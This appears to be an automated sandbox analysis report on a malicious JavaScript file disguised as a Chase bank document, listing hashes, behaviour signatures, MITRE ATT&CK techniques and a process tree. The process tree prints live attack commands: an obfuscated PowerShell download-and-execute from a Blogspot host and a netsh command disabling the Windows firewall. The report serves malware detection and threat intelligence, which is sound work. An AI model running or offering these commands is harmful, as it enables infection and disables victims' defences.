Analysis
-
max time kernel
137s -
max time network
198s -
platform
windows11-21h2_x64 -
resource
win11-20231222-en -
resource tags
-
submitted
16-01-2024 10:45
General
-
Target
New_ScanDoc#092387CHASEeAdvice.js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
UAC bypass 3 TTPs 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies registry class 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 38 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 62⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uxfqdz1a\uxfqdz1a.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5728.tmp" "c:\Users\Admin\AppData\Local\Temp\uxfqdz1a\CSCBA3B8444E65B4789B288C213A648995.TMP"4⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 8004⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 8004⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES5728.tmpFilesize
1KB
MD59df310e571587ef5d6f9271dd742da03
SHA1adbd4d48b7e34ca53a9e6192fbd97c28dbbc44ea
SHA2565931f4bc97e519cb65351f874f5ac85a11510225b9d0483cc795c29af104bdc4
SHA5124ee35307bec1101d730102a8f6414f4bb68e0035de377e3f3a0461dcd36e3e31f837a45033ab422fc16852875f633c492d9a096e23609b3068afe5d4c4852d16
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lzjgo4kl.kkv.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\uxfqdz1a\uxfqdz1a.dllFilesize
1KB
MD5df2b079fd225b145e3f4e9450b1b7949
SHA1e5fa96b7de63e8316c0c8edb3b0322603c44dd2e
SHA256a49df7b321367cf606d102050712b5ea51ac3aac0808a0bb7ad19a9b7b83d480
SHA512acae3386885e2ab05724ae10dcf55ac8cc1759fafa551de9c0fee70d9687b016e27c8eb24a9fa05372c8bd10eff02d00e775d9308b38d44c37cf71483d4d5740
-
\??\c:\Users\Admin\AppData\Local\Temp\uxfqdz1a\CSCBA3B8444E65B4789B288C213A648995.TMPFilesize
652B
MD5aa3cc8686cb07e4ee766e1d57d762821
SHA13dc7d28192b5dc21236d9128b095e181011a022d
SHA256d3d121816d9db87094a7d95b47370d53a1772b41be6f29adec0c17234b43126a
SHA5123fffcebc8da6987976f1c99d695720f8fe4a1b48bdccd9f5db05c77a61ec81d16f851f98c530787009eac0edae088e080fbffc8c4cb5502226baa3defe48588d
-
\??\c:\Users\Admin\AppData\Local\Temp\uxfqdz1a\uxfqdz1a.0.csFilesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
\??\c:\Users\Admin\AppData\Local\Temp\uxfqdz1a\uxfqdz1a.cmdlineFilesize
369B
MD5e878b39ea67eaa28e40b776aedfb970e
SHA13aae00ceef102087ff0a193200b888cdc47a2e9a
SHA256c8eeaf61c4681db5648d788679aa10855be494b39a1344b0100db32ad08d398e
SHA51221d3f783e4d540400756c750cdb5aac4d085fe7261026236f5b2b55e857e6c435a0ec97989a273a9edd37d3968d15d44788036e4a923325b22277835f3863be1
-
memory/2312-61-0x00000000701B0000-0x0000000070761000-memory.dmpFilesize
5.7MB
-
memory/2312-60-0x00000000701B0000-0x0000000070761000-memory.dmpFilesize
5.7MB
-
memory/2312-68-0x00000000701B0000-0x0000000070761000-memory.dmpFilesize
5.7MB
-
memory/3016-48-0x0000000070210000-0x00000000707C1000-memory.dmpFilesize
5.7MB
-
memory/3016-46-0x0000000070210000-0x00000000707C1000-memory.dmpFilesize
5.7MB
-
memory/3016-55-0x0000000070210000-0x00000000707C1000-memory.dmpFilesize
5.7MB
-
memory/3016-47-0x0000000001820000-0x0000000001830000-memory.dmpFilesize
64KB
-
memory/3016-43-0x0000000000400000-0x000000000048C000-memory.dmpFilesize
560KB
-
memory/3480-41-0x0000000004F60000-0x0000000004F70000-memory.dmpFilesize
64KB
-
memory/3480-71-0x0000000006550000-0x000000000655A000-memory.dmpFilesize
40KB
-
memory/3480-34-0x0000000000530000-0x00000000005BC000-memory.dmpFilesize
560KB
-
memory/3480-33-0x0000000074750000-0x0000000074F01000-memory.dmpFilesize
7.7MB
-
memory/3480-35-0x00000000053B0000-0x0000000005956000-memory.dmpFilesize
5.6MB
-
memory/3480-36-0x0000000004CA0000-0x0000000004D06000-memory.dmpFilesize
408KB
-
memory/3480-38-0x0000000004EA0000-0x0000000004F32000-memory.dmpFilesize
584KB
-
memory/3480-37-0x0000000004E00000-0x0000000004E9C000-memory.dmpFilesize
624KB
-
memory/3480-77-0x0000000004F60000-0x0000000004F70000-memory.dmpFilesize
64KB
-
memory/3480-42-0x0000000005140000-0x0000000005302000-memory.dmpFilesize
1.8MB
-
memory/3480-76-0x0000000074750000-0x0000000074F01000-memory.dmpFilesize
7.7MB
-
memory/3480-39-0x0000000004D10000-0x0000000004D60000-memory.dmpFilesize
320KB
-
memory/4332-13-0x000001D6E48A0000-0x000001D6E4A62000-memory.dmpFilesize
1.8MB
-
memory/4332-9-0x00007FFF54350000-0x00007FFF54E12000-memory.dmpFilesize
10.8MB
-
memory/4332-27-0x000001D6CC190000-0x000001D6CC198000-memory.dmpFilesize
32KB
-
memory/4332-31-0x000001D6CBB30000-0x000001D6CBB4A000-memory.dmpFilesize
104KB
-
memory/4332-10-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmpFilesize
64KB
-
memory/4332-44-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmpFilesize
64KB
-
memory/4332-11-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmpFilesize
64KB
-
memory/4332-57-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmpFilesize
64KB
-
memory/4332-12-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmpFilesize
64KB
-
memory/4332-45-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmpFilesize
64KB
-
memory/4332-69-0x000001D6CBFF0000-0x000001D6CC000000-memory.dmpFilesize
64KB
-
memory/4332-8-0x000001D6E42B0000-0x000001D6E42D2000-memory.dmpFilesize
136KB
-
memory/4332-70-0x000001D6E4A70000-0x000001D6E4BDA000-memory.dmpFilesize
1.4MB
-
memory/4332-29-0x000001D6E4A70000-0x000001D6E4BDA000-memory.dmpFilesize
1.4MB
-
memory/4332-74-0x000001D6E4A70000-0x000001D6E4BDA000-memory.dmpFilesize
1.4MB
-
memory/4332-75-0x00007FFF54350000-0x00007FFF54E12000-memory.dmpFilesize
10.8MB
-
memory/4332-40-0x00007FFF54350000-0x00007FFF54E12000-memory.dmpFilesize
10.8MB
-
memory/4332-30-0x000001D6CBAF0000-0x000001D6CBAFE000-memory.dmpFilesize
56KB